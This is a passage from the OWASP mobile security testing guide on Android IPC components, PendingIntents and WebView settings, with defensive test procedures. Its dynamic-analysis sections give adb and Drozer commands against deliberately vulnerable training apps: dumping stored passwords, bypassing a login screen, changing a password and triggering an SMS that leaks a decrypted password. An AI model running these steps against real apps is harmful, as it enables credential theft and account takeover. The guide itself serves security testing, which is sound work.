To test for sensitive functionality exposure through IPC mechanisms you should first enumerate all the IPC mechanisms the app uses and then try to identify whether sensitive data is leaked when the mechanisms are used.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#static-analysis","title":"Static Analysis","text":"We start by looking at the AndroidManifest.xml, where all activities, services, and content providers included in the app must be declared (otherwise the system won't recognize them and they won't run).
<intent-filter>
<service>
<provider>
<receiver>
An \"exported\" activity, service, or content can be accessed by other apps. There are two common ways to designate a component as exported. The obvious one is setting the export tag to true android:exported=\"true\"
. The second way involves defining an <intent-filter>
within the component element (<activity>
, <service>
, <receiver>
). When this is done, the export tag is automatically set to \"true\". To prevent all other Android apps from interacting with the IPC component element, be sure that the android:exported=\"true\"
value and an <intent-filter>
aren't in their AndroidManifest.xml
files unless this is necessary.
Remember that using the permission tag (android:permission
) will also limit other applications' access to a component. If your IPC is intended to be accessible to other applications, you can apply a security policy with the <permission>
element and set a proper android:protectionLevel
. When android:permission
is used in a service declaration, other applications must declare a corresponding <uses-permission>
element in their own manifest to start, stop, or bind to the service.
For more information about the content providers, please refer to the test case \"Testing Whether Stored Sensitive Data Is Exposed via IPC Mechanisms\" in chapter \"Testing Data Storage\".
Once you identify a list of IPC mechanisms, review the source code to see whether sensitive data is leaked when the mechanisms are used. For example, content providers can be used to access database information, and services can be probed to see if they return data. Broadcast receivers can leak sensitive information if probed or sniffed.
In the following, we use two example apps and give examples of identifying vulnerable IPC components:
In the \"Sieve\" app, we find three exported activities, identified by <activity>
:
<activity android:excludeFromRecents=\"true\" android:label=\"@string/app_name\" android:launchMode=\"singleTask\" android:name=\".MainLoginActivity\" android:windowSoftInputMode=\"adjustResize|stateVisible\">\n <intent-filter>\n <action android:name=\"android.intent.action.MAIN\" />\n <category android:name=\"android.intent.category.LAUNCHER\" />\n </intent-filter>\n</activity>\n<activity android:clearTaskOnLaunch=\"true\" android:excludeFromRecents=\"true\" android:exported=\"true\" android:finishOnTaskLaunch=\"true\" android:label=\"@string/title_activity_file_select\" android:name=\".FileSelectActivity\" />\n<activity android:clearTaskOnLaunch=\"true\" android:excludeFromRecents=\"true\" android:exported=\"true\" android:finishOnTaskLaunch=\"true\" android:label=\"@string/title_activity_pwlist\" android:name=\".PWList\" />\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#inspect-the-source-code","title":"Inspect the Source Code","text":"By inspecting the PWList.java
activity, we see that it offers options to list all keys, add, delete, etc. If we invoke it directly, we will be able to bypass the LoginActivity. More on this can be found in the dynamic analysis below.
In the \"Sieve\" app, we find two exported services, identified by <service>
:
<service android:exported=\"true\" android:name=\".AuthService\" android:process=\":remote\" />\n<service android:exported=\"true\" android:name=\".CryptoService\" android:process=\":remote\" />\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#inspect-the-source-code_1","title":"Inspect the Source Code","text":"Check the source code for the class android.app.Service
:
By reversing the target application, we can see that the service AuthService
provides functionality for changing the password and PIN-protecting the target app.
public void handleMessage(Message msg) {\n AuthService.this.responseHandler = msg.replyTo;\n Bundle returnBundle = msg.obj;\n int responseCode;\n int returnVal;\n switch (msg.what) {\n ...\n case AuthService.MSG_SET /*6345*/:\n if (msg.arg1 == AuthService.TYPE_KEY) /*7452*/ {\n responseCode = 42;\n if (AuthService.this.setKey(returnBundle.getString(\"com.mwr.example.sieve.PASSWORD\"))) {\n returnVal = 0;\n } else {\n returnVal = 1;\n }\n } else if (msg.arg1 == AuthService.TYPE_PIN) {\n responseCode = 41;\n if (AuthService.this.setPin(returnBundle.getString(\"com.mwr.example.sieve.PIN\"))) {\n returnVal = 0;\n } else {\n returnVal = 1;\n }\n } else {\n sendUnrecognisedMessage();\n return;\n }\n }\n }\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#broadcast-receivers","title":"Broadcast Receivers","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#inspect-the-androidmanifest_2","title":"Inspect the AndroidManifest","text":"In the \"Android Insecure Bank\" app, we find a broadcast receiver in the manifest, identified by <receiver>
:
<receiver android:exported=\"true\" android:name=\"com.android.insecurebankv2.MyBroadCastReceiver\">\n <intent-filter>\n <action android:name=\"theBroadcast\" />\n </intent-filter>\n</receiver>\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#inspect-the-source-code_2","title":"Inspect the Source Code","text":"Search the source code for strings like sendBroadcast
, sendOrderedBroadcast
, and sendStickyBroadcast
. Make sure that the application doesn't send any sensitive data.
If an Intent is broadcasted and received within the application only, LocalBroadcastManager
can be used to prevent other apps from receiving the broadcast message. This reduces the risk of leaking sensitive information.
To understand more about what the receiver is intended to do, we have to go deeper in our static analysis and search for usage of the class android.content.BroadcastReceiver
and the Context.registerReceiver
method, which is used to dynamically create receivers.
The following extract of the target application's source code shows that the broadcast receiver triggers transmission of an SMS message containing the user's decrypted password.
public class MyBroadCastReceiver extends BroadcastReceiver {\n String usernameBase64ByteString;\n public static final String MYPREFS = \"mySharedPreferences\";\n\n @Override\n public void onReceive(Context context, Intent intent) {\n // TODO Auto-generated method stub\n\n String phn = intent.getStringExtra(\"phonenumber\");\n String newpass = intent.getStringExtra(\"newpass\");\n\n if (phn != null) {\n try {\n SharedPreferences settings = context.getSharedPreferences(MYPREFS, Context.MODE_WORLD_READABLE);\n final String username = settings.getString(\"EncryptedUsername\", null);\n byte[] usernameBase64Byte = Base64.decode(username, Base64.DEFAULT);\n usernameBase64ByteString = new String(usernameBase64Byte, \"UTF-8\");\n final String password = settings.getString(\"superSecurePassword\", null);\n CryptoClass crypt = new CryptoClass();\n String decryptedPassword = crypt.aesDeccryptedString(password);\n String textPhoneno = phn.toString();\n String textMessage = \"Updated Password from: \"+decryptedPassword+\" to: \"+newpass;\n SmsManager smsManager = SmsManager.getDefault();\n System.out.println(\"For the changepassword - phonenumber: \"+textPhoneno+\" password is: \"+textMessage);\nsmsManager.sendTextMessage(textPhoneno, null, textMessage, null, null);\n }\n }\n }\n}\n
BroadcastReceivers should use the android:permission
attribute; otherwise, other applications can invoke them. You can use Context.sendBroadcast(intent, receiverPermission);
to specify permissions a receiver must have to read the broadcast. You can also set an explicit application package name that limits the components this Intent will resolve to. If left as the default value (null), all components in all applications will be considered. If non-null, the Intent can match only the components in the given application package.
You can enumerate IPC components with MobSF. To list all exported IPC components, upload the APK file and the components collection will be displayed in the following screen:
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#content-providers","title":"Content Providers","text":"The \"Sieve\" application implements a vulnerable content provider. To list the content providers exported by the Sieve app, execute the following command:
$ adb shell dumpsys package com.mwr.example.sieve | grep -Po \"Provider{[\\w\\d\\s\\./]+}\" | sort -u\nProvider{34a20d5 com.mwr.example.sieve/.FileBackupProvider}\nProvider{64f10ea com.mwr.example.sieve/.DBContentProvider}\n
Once identified, you can use jadx to reverse engineer the app and analyze the source code of the exported content providers to identify potential vulnerabilities.
To identify the corresponding class of a content provider, use the following information:
com.mwr.example.sieve
.DBContentProvider
.When analyzing the class com.mwr.example.sieve.DBContentProvider
, you'll see that it contains several URIs:
package com.mwr.example.sieve;\n...\npublic class DBContentProvider extends ContentProvider {\n public static final Uri KEYS_URI = Uri.parse(\"content://com.mwr.example.sieve.DBContentProvider/Keys\");\n public static final Uri PASSWORDS_URI = Uri.parse(\"content://com.mwr.example.sieve.DBContentProvider/Passwords\");\n...\n}\n
Use the following commands to call the content provider using the identified URIs:
$ adb shell content query --uri content://com.mwr.example.sieve.DBContentProvider/Keys/\nRow: 0 Password=1234567890AZERTYUIOPazertyuiop, pin=1234\n\n$ adb shell content query --uri content://com.mwr.example.sieve.DBContentProvider/Passwords/\nRow: 0 _id=1, service=test, username=test, password=BLOB, email=t@tedt.com\nRow: 1 _id=2, service=bank, username=owasp, password=BLOB, email=user@tedt.com\n\n$ adb shell content query --uri content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection email:username:password --where 'service=\\\"bank\\\"'\nRow: 0 email=user@tedt.com, username=owasp, password=BLOB\n
You are able now to retrieve all database entries (see all lines starting with \"Row:\" in the output).
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#activities_1","title":"Activities","text":"To list activities exported by an application, you can use the following command and focus on activity
elements:
$ aapt d xmltree sieve.apk AndroidManifest.xml\n...\nE: activity (line=32)\n A: android:label(0x01010001)=@0x7f05000f\n A: android:name(0x01010003)=\".FileSelectActivity\" (Raw: \".FileSelectActivity\")\n A: android:exported(0x01010010)=(type 0x12)0xffffffff\n A: android:finishOnTaskLaunch(0x01010014)=(type 0x12)0xffffffff\n A: android:clearTaskOnLaunch(0x01010015)=(type 0x12)0xffffffff\n A: android:excludeFromRecents(0x01010017)=(type 0x12)0xffffffff\nE: activity (line=40)\n A: android:label(0x01010001)=@0x7f050000\n A: android:name(0x01010003)=\".MainLoginActivity\" (Raw: \".MainLoginActivity\")\n A: android:excludeFromRecents(0x01010017)=(type 0x12)0xffffffff\n A: android:launchMode(0x0101001d)=(type 0x10)0x2\n A: android:windowSoftInputMode(0x0101022b)=(type 0x11)0x14\n E: intent-filter (line=46)\n E: action (line=47)\n A: android:name(0x01010003)=\"android.intent.action.MAIN\" (Raw: \"android.intent.action.MAIN\")\n E: category (line=49)\n A: android:name(0x01010003)=\"android.intent.category.LAUNCHER\" (Raw: \"android.intent.category.LAUNCHER\")\nE: activity (line=52)\n A: android:label(0x01010001)=@0x7f050009\n A: android:name(0x01010003)=\".PWList\" (Raw: \".PWList\")\n A: android:exported(0x01010010)=(type 0x12)0xffffffff\n A: android:finishOnTaskLaunch(0x01010014)=(type 0x12)0xffffffff\n A: android:clearTaskOnLaunch(0x01010015)=(type 0x12)0xffffffff\n A: android:excludeFromRecents(0x01010017)=(type 0x12)0xffffffff\nE: activity (line=60)\n A: android:label(0x01010001)=@0x7f05000a\n A: android:name(0x01010003)=\".SettingsActivity\" (Raw: \".SettingsActivity\")\n A: android:finishOnTaskLaunch(0x01010014)=(type 0x12)0xffffffff\n A: android:clearTaskOnLaunch(0x01010015)=(type 0x12)0xffffffff\n A: android:excludeFromRecents(0x01010017)=(type 0x12)0xffffffff\n...\n
You can identify an exported activity using one of the following properties:
intent-filter
sub declaration.android:exported
to 0xffffffff
.You can also use jadx to identify exported activities in the file AndroidManifest.xml
using the criteria described above:
<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<manifest xmlns:android=\"http://schemas.android.com/apk/res/android\" package=\"com.mwr.example.sieve\">\n...\n <!-- This activity is exported via the attribute \"exported\" -->\n <activity android:name=\".FileSelectActivity\" android:exported=\"true\" />\n <!-- This activity is exported via the \"intent-filter\" declaration -->\n <activity android:name=\".MainLoginActivity\">\n <intent-filter>\n <action android:name=\"android.intent.action.MAIN\"/>\n <category android:name=\"android.intent.category.LAUNCHER\"/>\n </intent-filter>\n </activity>\n <!-- This activity is exported via the attribute \"exported\" -->\n <activity android:name=\".PWList\" android:exported=\"true\" />\n <!-- Activities below are not exported -->\n <activity android:name=\".SettingsActivity\" />\n <activity android:name=\".AddEntryActivity\"/>\n <activity android:name=\".ShortLoginActivity\" />\n <activity android:name=\".WelcomeActivity\" />\n <activity android:name=\".PINActivity\" />\n...\n</manifest>\n
Enumerating activities in the vulnerable password manager \"Sieve\" shows that the following activities are exported:
.MainLoginActivity
.PWList
.FileSelectActivity
Use the command below to launch an activity:
# Start the activity without specifying an action or an category\n$ adb shell am start -n com.mwr.example.sieve/.PWList\nStarting: Intent { cmp=com.mwr.example.sieve/.PWList }\n\n# Start the activity indicating an action (-a) and an category (-c)\n$ adb shell am start -n \"com.mwr.example.sieve/.MainLoginActivity\" -a android.intent.action.MAIN -c android.intent.category.LAUNCHER\nStarting: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=com.mwr.example.sieve/.MainLoginActivity }\n
Since the activity .PWList
is called directly in this example, you can use it to bypass the login form protecting the password manager, and access the data contained within the password manager.
Services can be enumerated with the Drozer module app.service.info
:
dz> run app.service.info -a com.mwr.example.sieve\nPackage: com.mwr.example.sieve\n com.mwr.example.sieve.AuthService\n Permission: null\n com.mwr.example.sieve.CryptoService\n Permission: null\n
To communicate with a service, you must first use static analysis to identify the required inputs.
Because this service is exported, you can use the module app.service.send
to communicate with the service and change the password stored in the target application:
dz> run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 6345 7452 1 --extra string com.mwr.example.sieve.PASSWORD \"abcdabcdabcdabcd\" --bundle-as-obj\nGot a reply from com.mwr.example.sieve/com.mwr.example.sieve.AuthService:\n what: 4\n arg1: 42\n arg2: 0\n Empty\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#broadcast-receivers_1","title":"Broadcast Receivers","text":"To list broadcast receivers exported by an application, you can use the following command and focus on receiver
elements:
$ aapt d xmltree InsecureBankv2.apk AndroidManifest.xml\n...\nE: receiver (line=88)\n A: android:name(0x01010003)=\"com.android.insecurebankv2.MyBroadCastReceiver\" (Raw: \"com.android.insecurebankv2.MyBroadCastReceiver\")\n A: android:exported(0x01010010)=(type 0x12)0xffffffff\n E: intent-filter (line=91)\n E: action (line=92)\n A: android:name(0x01010003)=\"theBroadcast\" (Raw: \"theBroadcast\")\nE: receiver (line=119)\n A: android:name(0x01010003)=\"com.google.android.gms.wallet.EnableWalletOptimizationReceiver\" (Raw: \"com.google.android.gms.wallet.EnableWalletOptimizationReceiver\")\n A: android:exported(0x01010010)=(type 0x12)0x0\n E: intent-filter (line=122)\n E: action (line=123)\n A: android:name(0x01010003)=\"com.google.android.gms.wallet.ENABLE_WALLET_OPTIMIZATION\" (Raw: \"com.google.android.gms.wallet.ENABLE_WALLET_OPTIMIZATION\")\n...\n
You can identify an exported broadcast receiver using one of the following properties:
intent-filter
sub declaration.android:exported
set to 0xffffffff
.You can also use jadx to identify exported broadcast receivers in the file AndroidManifest.xml
using the criteria described above:
<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<manifest xmlns:android=\"http://schemas.android.com/apk/res/android\" package=\"com.android.insecurebankv2\">\n...\n <!-- This broadcast receiver is exported via the attribute \"exported\" as well as the \"intent-filter\" declaration -->\n <receiver android:name=\"com.android.insecurebankv2.MyBroadCastReceiver\" android:exported=\"true\">\n <intent-filter>\n <action android:name=\"theBroadcast\"/>\n </intent-filter>\n </receiver>\n <!-- This broadcast receiver is NOT exported because the attribute \"exported\" is explicitly set to false -->\n <receiver android:name=\"com.google.android.gms.wallet.EnableWalletOptimizationReceiver\" android:exported=\"false\">\n <intent-filter>\n <action android:name=\"com.google.android.gms.wallet.ENABLE_WALLET_OPTIMIZATION\"/>\n </intent-filter>\n </receiver>\n...\n</manifest>\n
The above example from the vulnerable banking application InsecureBankv2 shows that only the broadcast receiver named com.android.insecurebankv2.MyBroadCastReceiver
is exported.
Now that you know that there is an exported broadcast receiver, you can dive deeper and reverse engineer the app using jadx. This will allow you to analyze the source code searching for potential vulnerabilities that you could later try to exploit. The source code of the exported broadcast receiver is the following:
package com.android.insecurebankv2;\n...\npublic class MyBroadCastReceiver extends BroadcastReceiver {\n public static final String MYPREFS = \"mySharedPreferences\";\n String usernameBase64ByteString;\n\n public void onReceive(Context context, Intent intent) {\n String phn = intent.getStringExtra(\"phonenumber\");\n String newpass = intent.getStringExtra(\"newpass\");\n if (phn != null) {\n try {\n SharedPreferences settings = context.getSharedPreferences(\"mySharedPreferences\", 1);\n this.usernameBase64ByteString = new String(Base64.decode(settings.getString(\"EncryptedUsername\", (String) null), 0), \"UTF-8\");\n String decryptedPassword = new CryptoClass().aesDeccryptedString(settings.getString(\"superSecurePassword\", (String) null));\n String textPhoneno = phn.toString();\n String textMessage = \"Updated Password from: \" + decryptedPassword + \" to: \" + newpass;\n SmsManager smsManager = SmsManager.getDefault();\n System.out.println(\"For the changepassword - phonenumber: \" + textPhoneno + \" password is: \" + textMessage);\n smsManager.sendTextMessage(textPhoneno, (String) null, textMessage, (PendingIntent) null, (PendingIntent) null);\n } catch (Exception e) {\n e.printStackTrace();\n }\n } else {\n System.out.println(\"Phone number is null\");\n }\n }\n}\n
As you can see in the source code, this broadcast receiver expects two parameters named phonenumber
and newpass
. With this information you can now try to exploit this broadcast receiver by sending events to it using custom values:
# Send an event with the following properties:\n# Action is set to \"theBroadcast\"\n# Parameter \"phonenumber\" is set to the string \"07123456789\"\n# Parameter \"newpass\" is set to the string \"12345\"\n$ adb shell am broadcast -a theBroadcast --es phonenumber \"07123456789\" --es newpass \"12345\"\nBroadcasting: Intent { act=theBroadcast flg=0x400000 (has extras) }\nBroadcast completed: result=0\n
This generates the following SMS:
Updated Password from: SecretPassword@ to: 12345\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#sniffing-intents","title":"Sniffing Intents","text":"If an Android application broadcasts intents without setting a required permission or specifying the destination package, the intents can be monitored by any application that runs on the device.
To register a broadcast receiver to sniff intents, use the Drozer module app.broadcast.sniff
and specify the action to monitor with the --action
parameter:
dz> run app.broadcast.sniff --action theBroadcast\n[*] Broadcast receiver registered to sniff matching intents\n[*] Output is updated once a second. Press Control+C to exit.\n\nAction: theBroadcast\nRaw: Intent { act=theBroadcast flg=0x10 (has extras) }\nExtra: phonenumber=07123456789 (java.lang.String)\nExtra: newpass=12345 (java.lang.String)`\n
You can also use the following command to sniff the intents. However, the content of the extras passed will not be displayed:
$ adb shell dumpsys activity broadcasts | grep \"theBroadcast\"\nBroadcastRecord{fc2f46f u0 theBroadcast} to user 0\nIntent { act=theBroadcast flg=0x400010 (has extras) }\nBroadcastRecord{7d4f24d u0 theBroadcast} to user 0\nIntent { act=theBroadcast flg=0x400010 (has extras) }\n45: act=theBroadcast flg=0x400010 (has extras)\n46: act=theBroadcast flg=0x400010 (has extras)\n121: act=theBroadcast flg=0x400010 (has extras)\n144: act=theBroadcast flg=0x400010 (has extras)\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0030/","title":"Testing for Vulnerable Implementation of PendingIntent","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0030/#overview","title":"Overview","text":"When testing Pending Intents you must ensure that they are immutable and that the app explicitly specifies the exact package, action, and component that will receive the base intent.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0030/#static-analysis","title":"Static Analysis","text":"To identify vulnerable implementations, static analysis can be performed by looking for API calls used for obtaining a PendingIntent
. Such APIs are listed below:
PendingIntent getActivity(Context, int, Intent, int)\nPendingIntent getActivity(Context, int, Intent, int, Bundle)\nPendingIntent getActivities(Context, int, Intent, int, Bundle)\nPendingIntent getActivities(Context, int, Intent, int)\nPendingIntent getForegroundService(Context, int, Intent, int)\nPendingIntent getService(Context, int, Intent, int)\n
Once any of the above function is spotted, check the implementation of the base intent and the PendingIntent
for the security pitfalls listed in the Pending Intents section.
For example, in A-156959408(CVE-2020-0389), the base intent is implicit and also the PendingIntent
is mutable, thus making it exploitable.
private Notification createSaveNotification(Uri uri) {\n Intent viewIntent = new Intent(Intent.ACTION_VIEW)\n .setFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_GRANT_READ_URI_PERMISSION)\n .setDataAndType(uri, \"video/mp4\"); //Implicit Intent\n\n//... skip ...\n\n\nNotification.Builder builder = new Notification.Builder(this, CHANNEL_ID)\n .setSmallIcon(R.drawable.ic_android)\n .setContentTitle(getResources().getString(R.string.screenrecord_name))\n .setContentText(getResources().getString(R.string.screenrecord_save_message))\n .setContentIntent(PendingIntent.getActivity(\n this,\n REQUEST_CODE,\n viewIntent,\n Intent.FLAG_GRANT_READ_URI_PERMISSION)) // Mutable PendingIntent.\n .addAction(shareAction)\n .addAction(deleteAction)\n .setAutoCancel(true);\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0030/#dynamic-analysis","title":"Dynamic Analysis","text":"Frida can be used to hook the APIs used to get a PendingIntent
. This information can be used to determine the code location of the call, which can be further used to perform static analysis as described above.
Here's an example of such a Frida script that can be used to hook the PendingIntent.getActivity
function:
var pendingIntent = Java.use('android.app.PendingIntent');\n\nvar getActivity_1 = pendingIntent.getActivity.overload(\"android.content.Context\", \"int\", \"android.content.Intent\", \"int\");\n\ngetActivity_1.implementation = function(context, requestCode, intent, flags){\n console.log(\"[*] Calling PendingIntent.getActivity(\"+intent.getAction()+\")\");\n console.log(\"\\t[-] Base Intent toString: \" + intent.toString());\n console.log(\"\\t[-] Base Intent getExtras: \" + intent.getExtras());\n console.log(\"\\t[-] Base Intent getFlags: \" + intent.getFlags());\n return this.getActivity(context, requestCode, intent, flags);\n}\n
This approach can be helpful when dealing with applications with large code bases, where determining the control flow can sometimes be tricky.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0031/","title":"Testing JavaScript Execution in WebViews","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0031/#overview","title":"Overview","text":"To test for JavaScript execution in WebViews check the app for WebView usage and evaluate whether or not each WebView should allow JavaScript execution. If JavaScript execution is required for the app to function normally, then you need to ensure that the app follows all best practices.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0031/#static-analysis","title":"Static Analysis","text":"To create and use a WebView, an app must create an instance of the WebView
class.
WebView webview = new WebView(this);\nsetContentView(webview);\nwebview.loadUrl(\"https://www.owasp.org/\");\n
Various settings can be applied to the WebView (activating/deactivating JavaScript is one example). JavaScript is disabled by default for WebViews and must be explicitly enabled. Look for the method setJavaScriptEnabled
to check for JavaScript activation.
webview.getSettings().setJavaScriptEnabled(true);\n
This allows the WebView to interpret JavaScript. It should be enabled only if necessary to reduce the attack surface to the app. If JavaScript is necessary, you should make sure that
To remove all JavaScript source code and locally stored data, clear the WebView's cache with clearCache
when the app closes.
Devices running platforms older than Android 4.4 (API level 19) use a version of WebKit that has several security issues. As a workaround, the app must confirm that WebView objects display only trusted content if the app runs on these devices.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0031/#dynamic-analysis","title":"Dynamic Analysis","text":"Dynamic Analysis depends on operating conditions. There are several ways to inject JavaScript into an app's WebView:
To address these attack vectors, check the following:
Only files that are in the app data directory should be rendered in a WebView (see test case \"Testing for Local File Inclusion in WebViews\").
The HTTPS communication must be implemented according to best practices to avoid MITM attacks. This means:
To test for WebView protocol handlers check the app for WebView usage and evaluate whether or not the WebView should have resource access. If resource access is necessary you need to verify that it's implemented following best practices.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0032/#static-analysis","title":"Static Analysis","text":"Check the source code for WebView usage. The following WebView settings control resource access:
setAllowContentAccess
: Content URL access allows WebViews to load content from a content provider installed on the system, which is enabled by default .setAllowFileAccess
: Enables and disables file access within a WebView. The default value is true
when targeting Android 10 (API level 29) and below and false
for Android 11 (API level 30) and above. Note that this enables and disables file system access only. Asset and resource access is unaffected and accessible via file:///android_asset
and file:///android_res
.setAllowFileAccessFromFileURLs
: Does or does not allow JavaScript running in the context of a file scheme URL to access content from other file scheme URLs. The default value is true
for Android 4.0.3 - 4.0.4 (API level 15) and below and false
for Android 4.1 (API level 16) and above.setAllowUniversalAccessFromFileURLs
: Does or does not allow JavaScript running in the context of a file scheme URL to access content from any origin. The default value is true
for Android 4.0.3 - 4.0.4 (API level 15) and below and false
for Android 4.1 (API level 16) and above.If one or more of the above methods is/are activated, you should determine whether the method(s) is/are really necessary for the app to work properly.
If a WebView instance can be identified, find out whether local files are loaded with the loadURL
method.
WebView webView = new WebView(this);\nwebView.loadUrl(\"file:///android_asset/filename.html\");\n
The location from which the HTML file is loaded must be verified. If the file is loaded from external storage, for example, the file is readable and writable by everyone. This is considered a bad practice. Instead, the file should be placed in the app's assets directory.
webview.loadUrl(\"file:///\" +\nEnvironment.getExternalStorageDirectory().getPath() +\n\"filename.html\");\n
The URL specified in loadURL
should be checked for dynamic parameters that can be manipulated; their manipulation may lead to local file inclusion.
Use the following code snippet and best practices to deactivate protocol handlers, if applicable:
//If attackers can inject script into a WebView, they could access local resources. This can be prevented by disabling local file system access, which is enabled by default. You can use the Android WebSettings class to disable local file system access via the public method `setAllowFileAccess`.\nwebView.getSettings().setAllowFileAccess(false);\n\nwebView.getSettings().setAllowFileAccessFromFileURLs(false);\n\nwebView.getSettings().setAllowUniversalAccessFromFileURLs(false);\n\nwebView.getSettings().setAllowContentAccess(false);\n
To identify the usage of protocol handlers, look for ways to trigger phone calls and ways to access files from the file system while you're using the app.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0033/","title":"Testing for Java Objects Exposed Through WebViews","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0033/#overview","title":"Overview","text":"To test for Java objects exposed through WebViews check the app for WebViews having JavaScript enabled and determine whether the WebView is creating any JavaScript interfaces aka. \"JavaScript Bridges\". Finally, check whether an attacker could potentially inject malicious JavaScript code.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0033/#static-analysis","title":"Static Analysis","text":"The following example shows how addJavascriptInterface
is used to bridge a Java Object and JavaScript in a WebView:
WebView webview = new WebView(this);\nWebSettings webSettings = webview.getSettings();\nwebSettings.setJavaScriptEnabled(true);\n\nMSTG_ENV_008_JS_Interface jsInterface = new MSTG_ENV_008_JS_Interface(this);\n\nmyWebView.addJavascriptInterface(jsInterface, \"Android\");\nmyWebView.loadURL(\"http://example.com/file.html\");\nsetContentView(myWebView);\n
In Android 4.2 (API level 17) and above, an annotation @JavascriptInterface
explicitly allows JavaScript to access a Java method.
public class MSTG_ENV_008_JS_Interface {\n\n    Context mContext;\n\n    /** Instantiate the interface and set the context */\n    MSTG_ENV_008_JS_Interface(Context c) {\n        mContext = c;\n    }\n\n    @JavascriptInterface\n    public String returnString () {\n        return \"Secret String\";\n    }\n\n    /** Show a toast from the web page */\n    @JavascriptInterface\n    public void showToast(String toast) {\n        Toast.makeText(mContext, toast, Toast.LENGTH_SHORT).show();\n    }\n}\n
This is how you can call the method returnString
from JavaScript, the string \"Secret String\" will be stored in the variable result
:
var result = window.Android.returnString();\n
With access to the JavaScript code, via, for example, stored XSS or a MITM attack, an attacker can directly call the exposed Java methods.
If addJavascriptInterface
is necessary, take the following considerations:
WebView.getUrl
).<uses-sdk android:minSdkVersion=\"17\" />
).Dynamic analysis of the app can show you which HTML or JavaScript files are loaded and which vulnerabilities are present. The procedure for exploiting the vulnerability starts with producing a JavaScript payload and injecting it into the file that the app is requesting. The injection can be accomplished via a MITM attack or direct modification of the file if it is stored in external storage. The whole process can be accomplished via Drozer and weasel (MWR's advanced exploitation payload), which can install a full agent, injecting a limited agent into a running process or connecting a reverse shell as a Remote Access Tool (RAT).
A full description of the attack is included in the blog article \"WebView addJavascriptInterface Remote Code Execution\".
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0035/","title":"Testing for Overlay Attacks","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0035/#overview","title":"Overview","text":"To test for overlay attacks you need to check the app for usage of certain APIs and attributes typically used to protect against overlay attacks as well as check the Android version that the app is targeting.
To mitigate these attacks please carefully read the general guidelines about Android View security in the Android Developer Documentation. For instance, the so-called touch filtering is a common defense against tapjacking, which contributes to safeguarding users against these vulnerabilities, usually in combination with other techniques and considerations as we introduce in this section.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0035/#static-analysis","title":"Static Analysis","text":"To start your static analysis you can check the app for the following methods and attributes (non-exhaustive list):
onFilterTouchEventForSecurity
for more fine-grained control and to implement a custom security policy for views.android:filterTouchesWhenObscured
to true or call setFilterTouchesWhenObscured
.Some attributes might affect the app as a whole, while others can be applied to specific components. The latter would be the case when, for example, there is a business need to specifically allow overlays while wanting to protect sensitive input UI elements. The developers might also take additional precautions to confirm the user's actual intent which might be legitimate and tell it apart from a potential attack.
As a final note, always remember to properly check the API level that the app is targeting and the implications that this has. For instance, Android 8.0 (API level 26) introduced changes to apps requiring SYSTEM_ALERT_WINDOW
(\"draw on top\"). From this API level on, apps using TYPE_APPLICATION_OVERLAY
will be always shown above other windows having other types such as TYPE_SYSTEM_OVERLAY
or TYPE_SYSTEM_ALERT
. You can use this information to ensure that no overlay attacks may occur at least for this app in this concrete Android version.
Abusing this kind of vulnerability in a dynamic manner can be pretty challenging and very specialized as it closely depends on the target Android version. For instance, for versions up to Android 7.0 (API level 24) you can use the following APKs as a proof of concept to identify the existence of the vulnerabilities.
To test for WebViews cleanup you should inspect all APIs related to WebView data deletion and try to fully track the data deletion process.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0037/#static-analysis","title":"Static Analysis","text":"Start by identifying the usage of the following WebView APIs and carefully validate the mentioned best practices.
Initialization: an app might be initializing the WebView in a way to avoid storing certain information by using setDomStorageEnabled
, setAppCacheEnabled
or setDatabaseEnabled
from android.webkit.WebSettings
. The DOM Storage (for using the HTML5 local storage), Application Caches and Database Storage APIs are disabled by default, but apps might set these settings explicitly to \"true\".
Cache: Android's WebView class offers the clearCache
method which can be used to clear the cache for all WebViews used by the app. It receives a boolean input parameter (includeDiskFiles
) which will wipe all stored resource including the RAM cache. However if it's set to false, it will only clear the RAM cache. Check the app for usage of the clearCache
method and verify its input parameter. Additionally, you may also check if the app is overriding onRenderProcessUnresponsive
for the case when the WebView might become unresponsive, as the clearCache
method might also be called from there.
WebStorage APIs: WebStorage.deleteAllData
can be also used to clear all storage currently being used by the JavaScript storage APIs, including the Web SQL Database and the HTML5 Web Storage APIs.
